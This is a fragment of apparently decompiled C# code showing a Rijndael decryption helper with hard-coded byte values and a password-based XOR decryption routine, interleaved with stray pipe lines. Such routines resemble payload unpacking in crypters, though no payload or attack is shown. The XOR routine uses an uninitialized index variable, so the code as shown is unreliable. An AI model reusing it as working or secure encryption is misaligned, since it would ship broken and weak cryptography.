|
|||
|
(byte) 3,
|
|||
|
(byte) 2,
|
|||
|
(byte) 1
|
|||
|
};
|
|||
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] decrypt(byte[] message, string password)
|
|||
|
{
|
|||
|
byte[] bytes = Encoding.Default.GetBytes(password);
|
|||
|
int num1 = (int) message[checked (message.Length - 1)] ^ 112;
|
|||
|
byte[] arySrc = new byte[checked (message.Length + 1)];
|
|||
|
int num2 = checked (message.Length - 1);
|
|||
|
int index1 = 0;
|
|||
|
while (index1 <= num2)
|
|||
|
{
|
|||
|
int index2;
|
|||
|
arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
|
|||
|
if (index2 == checked (password.Length - 1))
|
|||
|
index2 = 0;
|
|||
|
else
|
|||
|
checked { ++index2; }
|
|||
|
checked { ++index1; }
|
|||
|
}
|
|||
|
return (byte[]) Microsoft.VisualBasic.CompilerServices.Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
|
|||
|
}
|
|||
|
}
|